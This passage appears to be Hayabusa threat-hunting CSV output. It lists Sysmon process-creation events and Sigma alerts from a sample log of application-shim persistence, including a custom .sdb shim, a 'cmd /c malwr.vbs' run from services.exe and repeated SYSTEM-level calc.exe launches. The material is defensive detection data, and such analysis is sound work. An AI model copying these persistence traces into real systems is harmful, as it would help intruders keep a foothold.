Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:00:01.518 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\wsqmcons.exe : Path: C:\Windows\System32\wsqmcons.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:00:01.539 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" : Path: C:\Windows\System32\schtasks.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\wsqmcons.exe ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:10:34.489 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:18:54.257 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: EXAMPLE\user01 : Parent Command: 
winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:18:57.202 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" : Path: C:\Windows\System32\mmc.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:21:05.306 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:22:28.886 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb : Path: C:\Windows\System32\rundll32.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:22:33.593 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows NT\Accessories\WORDPAD.EXE"" ""C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb"" : Path: C:\Program Files\Windows NT\Accessories\wordpad.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL 
C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:26:05.397 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:26:08.852 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:31:05.509 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:36:05.610 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:05.702 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: 
C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:11.440 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\cmd.EXE /c malwr.vbs : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logoff : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:18.290 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x1 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:18.410 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\servicing\TrustedInstaller.exe : Path: C:\Windows\servicing\TrustedInstaller.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:49.576 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:49.856 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.157 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000001 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,informational,Process Creation,Command: wininit.exe : Path: C:\Windows\System32\wininit.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c 
,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.387 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.427 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\services.exe : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.467 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.497 
+09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsm.exe : Path: C:\Windows\System32\lsm.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:51.308 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:51.599 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\VBoxService.exe : Path: C:\Windows\System32\VBoxService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:51.679 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:51.789 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:53.111 
+09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k GPSvcGroup : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:53.571 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\spoolsv.exe : Path: C:\Windows\System32\spoolsv.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.102 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Startup : Path: C:\Windows\System32\gpscript.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.593 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" : Path: C:\Program Files\freeSSHd\FreeSSHDService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.783 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""taskhost.exe"" : Path: C:\Windows\System32\taskhost.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.793 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.813 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\slui.exe"" : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,informational,Process 
Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logon : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.725 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: 
EXAMPLE\user01 : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.805 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.965 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe : Path: C:\Windows\Sysmon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 
08:18:56.055 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.406 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe : Path: C:\Windows\System32\wlms\wlms.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:56.626 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding : Path: C:\Windows\System32\wbem\unsecapp.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:57.237 